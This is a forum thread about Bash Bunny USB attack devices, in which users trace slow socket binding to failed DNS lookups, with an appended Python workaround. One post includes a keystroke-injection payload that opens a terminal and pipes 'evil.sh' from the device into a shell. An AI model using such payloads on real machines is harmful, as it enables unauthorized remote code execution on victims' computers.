audibleblink Posted March 15, 2017 (edited)

Has anyone else tried to bind a socket on their BB using something like netcat or python -m SimpleHTTPServer?

When connected to the BB through ssh (ecm_ethernet), commands that bind sockets take ~15 seconds to execute. When connected through serial, everything acts as normal.

I made a GitHub issue about it, but wasn't sure if that's the right place since that repo is for payloads - https://github.com/hak5/bashbunny-payloads/issues/57

Dave-ee Jones Posted March 15, 2017

Well, if you think of the Bash Bunny as a small Linux machine then it would predominantly be made for Serial shells. Using SSH, it may have to convert its connection to Serial before it can perform such an action. I'm not quite sure though. Do you have to use SSH?

audibleblink (Author) Posted March 15, 2017

If I code something like this:

    LED R
    python -m SimpleHTTPServer
    QUACK GUI space
    Q ENTER
    Q STRING terminal
    Q ENTER
    Q STRING curl $HOST_IP/evil.sh \| sh

(with appropriate delays) it fails because the server takes 15 seconds to start anyway. I don't think it has anything to do with ssh. I was just logged in through ssh to develop the payload.

Dave-ee Jones Posted March 15, 2017

Well, it is starting a server up... Not exactly the quickest thing to do. Just be silly and set the delay to ~15-20 seconds :P

Torrey Posted March 15, 2017

I replied to your issue on GitHub before I realized you had a thread here too. The server is up for me in under 1 second and I made a quick video capture. The only difference that comes to mind is that when I got ICS working on Mac I updated the installed packages on the BB.

audibleblink (Author) Posted March 15, 2017

14 minutes ago, audibleblink said:
> When connected through serial, everything acts as normal.

It's a very quick thing to do. It takes under a second when I run it in serial mode.

audibleblink (Author) Posted March 15, 2017 (edited)

5 minutes ago, Torrey said:
> I replied to your issue on github before I realized you had a thread here too. The server is up for me in under 1 second and I made a quick video capture. The only difference that comes to mind is that when I got ICS working on Mac I updated the installed packages on the BB.

Oh thanks man! I guess it's me then. I'm using Linux. I can't think of a reason why I wouldn't see the delay in serial. Are you using ECM too? I think I'll try RNDIS just to see if anything changes.

edit: nope. Same delay with rndis_ethernet.

Sebkinne Posted March 15, 2017

2 minutes ago, audibleblink said:
> Oh thanks man! I guess it's me then. I'm using linux. I can't think of a reason why I wouldn't see the delay in serial. Are you using ECM too? I think I'll try RNDIS just to see if anything changes.

Works fine for me (C, Python, and Go) via SSH, a payload, or serial. The bind is pretty much instantaneous.

Torrey Posted March 15, 2017

The reason for the delay seems to be that your BB doesn't have internet access. I had the slow response when I disabled the internet sharing. As far as using it as a payload it seems you'd have to add a delay to your script like @Dave-ee Jones mentioned.

audibleblink (Author) Posted March 15, 2017

Right on, thanks Seb. Guess it's just me, I'll close my issue and run a restore.

audibleblink (Author) Posted March 15, 2017 (edited)

Hmm, nope. Fresh restore and it still happens. wth? Tried it on another computer too.

Sebkinne Posted March 15, 2017

Just a heads-up for anyone facing the same issue that missed the discussion on IRC:

When the Bash Bunny does not have an internet connection, binding to 0.0.0.0 will be slow as this will usually result in lookups expecting an internet connection. The 'fix' for this is simply binding to the Bash Bunny's IP address directly (172.16.64.1). That way, there is no delay in languages / frameworks that do the actual interface binding under the hood.

audibleblink (Author) Posted March 16, 2017 (edited)

For future readers:

I was using Python's SimpleHTTPServer to try to serve the local directory. Even when binding the USB's network interface with $HOST_IP, it would still make that request and wait 15 seconds before continuing on. The answer for me was to disallow outgoing requests. This is the code that made the webserver start instantly.

    iptables -A OUTPUT -p udp --dport 53 -j DROP
    python -m SimpleHTTPServer 80

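Added example, not code from any poster in this thread: Python's HTTPServer.server_bind() calls socket.getfqdn() on the bind address, a name lookup that has to time out when no resolver is reachable, which is consistent with the delay persisting after binding to a specific IP. The sketch uses Python 3's http.server (the successor to SimpleHTTPServer); NoLookupHTTPServer, timed_bind, compare and the 0.5-second slow_getfqdn stand-in for an unreachable resolver are constructed for illustration.

```python
import http.server
import socketserver
import time
from unittest import mock


class NoLookupHTTPServer(http.server.HTTPServer):
    """HTTPServer that skips the socket.getfqdn() call made in server_bind()."""

    def server_bind(self):
        # Bind exactly as TCPServer does, but do not resolve the address.
        socketserver.TCPServer.server_bind(self)
        host, port = self.server_address[:2]
        self.server_name = host  # literal bind address, no DNS query
        self.server_port = port


def timed_bind(server_cls, addr=("127.0.0.1", 0)):
    """Return (seconds spent creating and binding the server, server_name)."""
    start = time.monotonic()
    srv = server_cls(addr, http.server.SimpleHTTPRequestHandler)
    elapsed = time.monotonic() - start
    name = srv.server_name
    srv.server_close()
    return elapsed, name


def slow_getfqdn(name=""):
    # Constructed stand-in for a resolver timeout (0.5 s here, ~15 s in the thread).
    time.sleep(0.5)
    return name


def compare():
    """Time the stock and the no-lookup server with the slow resolver in place."""
    with mock.patch("socket.getfqdn", slow_getfqdn):
        stock, _ = timed_bind(http.server.HTTPServer)
        patched, name = timed_bind(NoLookupHTTPServer)
    return stock, patched, name


if __name__ == "__main__":
    stock, patched, name = compare()
    print(f"stock HTTPServer:   {stock:.2f}s")
    print(f"NoLookupHTTPServer: {patched:.2f}s (server_name={name})")
```
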